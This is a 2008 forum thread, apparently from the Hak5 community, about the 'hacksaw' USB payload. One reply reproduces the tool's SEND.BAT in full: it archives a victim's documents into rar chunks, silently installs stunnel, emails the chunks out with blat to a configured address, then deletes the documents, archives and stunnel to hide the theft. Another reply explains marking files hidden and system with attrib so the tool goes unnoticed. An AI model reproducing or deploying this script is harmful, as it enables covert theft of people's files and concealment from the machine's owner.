nightowl Posted January 2, 2008 Posted January 2, 2008 hello everyone 8-) . . . and happy new year! I was trying to use hacksaw. I downloaded the file to install on my thumb drive, but there is no send. bat file to see in this compressed file: http://www.hak5.org/releases/2x03/hacksaw/...w_ver0.2poc.rar Am i wrong? Quote
digip Posted January 2, 2008 Posted January 2, 2008 When trying to extract the files from the rar archive, you will not see certain file sbecause they have the +HS attribute set. In a cmd window you can unset these for the files with the ATTRIB command. here is what i got from the SEND.BAT file: :: Configure Email Options SET emailfrom= SET emailto= SET password= :: Archive documents in 1MB chunks rar a goodies.rar .docs -v1024k -vn stunnel-4.11.exe -install -quiet net start stunnel GOTO sendfiles :cleanup :: Stop stunnel rem taskkill /f /im stunnel-4.11.exe (??) net stop stunnel stunnel-4.11.exe -uninstall -quiet :: Delete documents rmdir /s /q docs :: Delete archive del /q /f goodies*.* GOTO end :sendfiles for %%i in (goodies.r*) do blat.exe %%i -base64 -to %emailto% -u %emailfrom% -pw %password% -f %emailfrom% -server 127.0.0.1:1099 GOTO cleanup :end Quote
nightowl Posted January 2, 2008 Author Posted January 2, 2008 Ok thanks man 8-) But in fact the real problem did'nt solve exactly with showing the hidden files. I had to make windows show the system files indeed! In this case only i can see all the files of the folder sbs, tough i could see the files with the CLI. Why is it considered by windows as system files indeed? Quote
sc0rpi0 Posted January 2, 2008 Posted January 2, 2008 Ok thanks man 8-) But in fact the real problem did'nt solve exactly with showing the hidden files. I had to make windows show the system files indeed! In this case only i can see all the files of the folder sbs, tough i could see the files with the CLI. Why is it considered by windows as system files indeed? The reason why you had to tell windows to show the hidden and system files to see the hacksaw stuff is because the hacksaw stuff was initially hidden to avoid being seen. To make windows consider a file hidden and a system file, do this: attrib "file location" +s +h +s is what makes the file a "system file" +h is what makes the file a "hidden file" Hope this helps. Quote
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.